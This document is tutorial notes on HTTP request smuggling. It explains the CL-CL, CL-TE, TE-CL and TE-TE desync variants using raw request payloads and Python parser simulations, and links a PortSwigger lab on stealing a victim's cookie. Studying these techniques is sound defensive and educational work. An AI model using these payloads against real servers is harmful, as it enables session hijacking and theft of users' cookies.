Causes

Two HTTP/1.1 features: Keep-Alive and pipelining

This attack mostly occurs between a proxy and the back end.

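Because the proxy has to fetch a large amount of information and data from the back end, and the two endpoints are relatively fixed, a persistent TCP connection is an effective way to reduce overhead while speeding up access.
The proxy (acting as a client) may have many requests in flight at once and cannot wait for the server to answer one before sending the next; pipelining (first in, first out) lets it submit requests in a batch without waiting for each response.
Now consider: with these two features combined, could one request contaminate another?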

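Persistent connections

In HTTP/1.1 all connections are persistent by default unless explicitly declared otherwise.

Pipelining

HTTP pipelining depends on support from both the client and the server. Servers that comply with HTTP/1.1 support pipelining. This does not mean the server has to pipeline its responses, only that it must not fail when it receives pipelined requests.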
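
To make the "one connection, many requests" idea concrete, here is a minimal sketch of how a receiver might cut a pipelined byte stream back into individual requests. The function name `split_pipelined` and the sample paths `/a` and `/b` are made up for illustration; the sketch only understands Content-Length framing and is not how any particular server is implemented.

```python
def split_pipelined(stream: bytes) -> list:
    """Split back-to-back HTTP/1.1 requests using Content-Length only."""
    requests = []
    while stream:
        head, sep, rest = stream.partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("incomplete header block")
        length = 0
        # Skip the request line, then look for a Content-Length header.
        for line in head.split(b"\r\n")[1:]:
            name, _, value = line.partition(b":")
            if name.strip().lower() == b"content-length":
                length = int(value.strip())
        requests.append(head + sep + rest[:length])
        # Whatever follows the body is treated as the start of the next request.
        stream = rest[length:]
    return requests


first = b"GET /a HTTP/1.1\r\nHost: example.com\r\n\r\n"
second = b"POST /b HTTP/1.1\r\nHost: example.com\r\nContent-Length: 3\r\n\r\nx=1"
parts = split_pipelined(first + second)
print(len(parts))
```

The important detail is the last line of the loop: the boundary between requests exists only in the parser's interpretation of the length, so two parsers that disagree on the length also disagree on where the next request starts.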

Types

CL = Content-Length
TE = Transfer-Encoding

CL-CL

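According to RFC 7230, a request with two Content-Length headers (and no Transfer-Encoding) whose values differ must be rejected directly with a 400 error.
The problem appears when the front end and back end do not follow the specification strictly and resolve the CL headers in order, the proxy taking the first and the back end the second.
Consider the following request: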

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 6\r\n <- Frontend sees this
Content-Length: 5\r\n <- Backend sees this
\r\n
12345G

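The front-end (proxy) server takes the body length as 6 and forwards the whole request above to the back-end server.
The back-end server takes the body length as 5, reads 5 characters, and leaves the rest in its buffer, treating G as part of the next request.
When the next request reaches the back end, the back end reads from the buffer first, and the request is contaminated: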

GPOST / HTTP/1.1\r\n
Host: example.com

Combined effect of the two requests:

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 6\r\n       <- Frontend sees this
Content-Length: 5\r\n       <- Backend sees this
\r\n
12345GPOST / HTTP/1.1\r\n
Host: example.com

---

Response : Unknown method GPOST
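
The CL-CL desync above can be replayed offline with a few lines of Python. This is only a sketch under an assumption: the front end is modeled as taking the first Content-Length and the back end the last one. The helper `body_length` is hypothetical, and real servers may pick differently or reject the request.

```python
def body_length(head: bytes, pick: str) -> int:
    """Return Content-Length, taking the 'first' or 'last' duplicate header."""
    values = [
        int(line.split(b":", 1)[1].strip())
        for line in head.split(b"\r\n")[1:]
        if line.lower().startswith(b"content-length:")
    ]
    return values[0] if pick == "first" else values[-1]


raw = (
    b"POST / HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"Content-Length: 6\r\n"
    b"Content-Length: 5\r\n"
    b"\r\n"
    b"12345G"
)
head, _, body = raw.partition(b"\r\n\r\n")

forwarded = body[:body_length(head, "first")]     # front end forwards 6 bytes
consumed = forwarded[:body_length(head, "last")]  # back end reads only 5 bytes
leftover = forwarded[len(consumed):]              # stays in the back-end buffer

next_request = b"POST / HTTP/1.1\r\nHost: example.com\r\n\r\n"
poisoned = leftover + next_request                # what the back end parses next
print(poisoned.split(b" ")[0])
```

The leftover byte is glued onto the following request's method, which matches the "Unknown method GPOST" response shown above.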

CL-TE

The front end uses CL and the back end uses TE.
The most common TE value is, of course, chunked transfer encoding.

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 6\r\n           <- Frontend sees this
Transfer-Encoding: chunked\r\n  <- Backend sees this
\r\n
0\r\n
\r\n
GPOST / HTTP/1.1

---

Response : Unknown method GPOST

Because the front end parses by CL, it takes the following 6 bytes as the request body:

 0\r\n
 \r\n
 G

The back end parses by TE, treats 0\r\n\r\n as the end of the body, and considers everything after it part of the next request.
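
A small simulation shows both views of the same bytes. The decoder `read_chunked` is a simplified illustration written for this note (it assumes no trailer fields and does no error handling), not a real server's parser.

```python
def read_chunked(data: bytes):
    """Decode a chunked body; return (decoded_body, unread_bytes)."""
    decoded = b""
    while True:
        size_line, _, data = data.partition(b"\r\n")
        # Chunk sizes are hexadecimal; drop any chunk extension after ';'.
        size = int(size_line.split(b";")[0], 16)
        if size == 0:
            # Skip the CRLF that closes the (empty) trailer section.
            _, _, data = data.partition(b"\r\n")
            return decoded, data
        decoded += data[:size]
        data = data[size + 2:]  # drop the chunk data and its trailing CRLF


# Front end: Content-Length: 6, so these 6 bytes are forwarded as the body.
forwarded = b"0\r\n\r\nG"
print(len(forwarded))

# Back end: chunked, so the body ends at the zero-size chunk.
decoded, leftover = read_chunked(forwarded)
print(leftover)
```

Under these assumptions the back end sees an empty body and keeps the single byte G in its buffer, where it becomes the prefix of the next request.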

TE-CL

The front end uses TE and the back end uses CL.

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 3\r\n           <- Backend sees this
Transfer-Encoding: chunked\r\n  <- Frontend sees this
\r\n
6\r\n
PREFIX\r\n
0\r\n
\r\n

POST / HTTP/1.1\r\n
Host: example.com
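
The TE-CL request above can be traced the same way. In this sketch the front end is assumed to forward the chunked body unchanged, and the back end is assumed to honor Content-Length: 3; `chunked_end` is a hypothetical helper that only locates the end of a chunked body with no trailer fields.

```python
def chunked_end(data: bytes) -> int:
    """Return the offset just past a chunked body (no trailer fields assumed)."""
    pos = 0
    while True:
        eol = data.index(b"\r\n", pos)
        size = int(data[pos:eol], 16)  # chunk size is hexadecimal
        pos = eol + 2
        if size == 0:
            return pos + 2             # skip the final CRLF
        pos += size + 2                # skip chunk data and its CRLF


stream = (
    b"6\r\n"
    b"PREFIX\r\n"
    b"0\r\n"
    b"\r\n"
)
next_request = b"POST / HTTP/1.1\r\nHost: example.com\r\n\r\n"

front_end_body = stream[:chunked_end(stream)]  # front end: the whole chunked body
back_end_body = front_end_body[:3]             # back end: Content-Length: 3
leftover = front_end_body[3:]                  # left in the back-end buffer
poisoned = leftover + next_request
print(back_end_body, poisoned[:6])
```

The back end consumes only `6\r\n`, so the next request it parses starts with PREFIX instead of POST.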

TE-TE

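This case arises because, with two TE headers, one of them is deliberately made invalid so that either the front end or the back end fails to parse it, ignores the TE headers, and falls back to CL. In effect it is therefore TE-CL or CL-TE; the telltale sign is a request containing one CL header and two TE headers.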

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-length: 4\r\n
Transfer-Encoding: chunked\r\n
Transfer-Encoding: cow\r\n
\r\n
5c\r\n
GPOST / HTTP/1.1\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 15\r\n
\r\n
x=1\r\n
0\r\n
\r\n

Because the second TE header is invalid, this is effectively TE-CL:

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-length: 4\r\n           <- Backend sees this second
Transfer-Encoding: chunked\r\n  <- Frontend sees this
Transfer-Encoding: cow\r\n      <- Backend sees this first and ignores it
\r\n
5c\r\n
GPOST / HTTP/1.1\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 15\r\n
\r\n
x=1\r\n
0\r\n
\r\n

The front end parses by TE and treats everything below as valid body data:

 5c\r\n
 GPOST / HTTP/1.1\r\n
 Content-Type: application/x-www-form-urlencoded\r\n
 Content-Length: 15\r\n
 \r\n
 x=1\r\n
 0\r\n
 \r\n

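The back end first tries to parse by TE, but the TE value is invalid, so it ignores the TE header and falls back to CL. Because the length is 4, it treats 5c\r\n as the entire body of this request and everything after it as the next request.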
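
The numbers in this payload can be checked with a short script. The `framing` function below is a hypothetical model of the two parser behaviors described here (one accepts chunked if any TE value is `chunked`, the other drops TE when it meets an unknown value); it is an assumption for illustration, not the logic of any specific server.

```python
smuggled = (
    b"GPOST / HTTP/1.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 15\r\n"
    b"\r\n"
    b"x=1"
)
# The chunk size is the hex length of the smuggled data.
size_line = format(len(smuggled), "x").encode() + b"\r\n"
body = size_line + smuggled + b"\r\n0\r\n\r\n"


def framing(te_values, tolerant):
    """Pick 'chunked' or 'content-length' for a list of Transfer-Encoding values.

    tolerant=True models a parser that uses chunked if any value is 'chunked';
    tolerant=False models one that ignores TE when any value is unknown.
    """
    if not te_values:
        return "content-length"
    known = [v.strip().lower() == "chunked" for v in te_values]
    if tolerant:
        return "chunked" if any(known) else "content-length"
    return "chunked" if all(known) else "content-length"


print(size_line, len(size_line))
print(framing(["chunked", "cow"], tolerant=True))
print(framing(["chunked", "cow"], tolerant=False))
```

The smuggled block is 92 bytes, which is 5c in hex, and the size line `5c\r\n` is exactly 4 bytes long, which is why the outer request declares Content-length: 4.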

Pitfall: when testing with Repeater, turn off the automatic Content-Length update!

PortSwigger labs

https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
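CL-TE model
The attack request essentially sends the first half of an HTTP request on the victim's behalf. The targeted endpoint posts a comment, so the victim's first HTTP request to the site ends up appearing as a comment posted by the attacker, which makes it possible to steal the victim's cookie.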
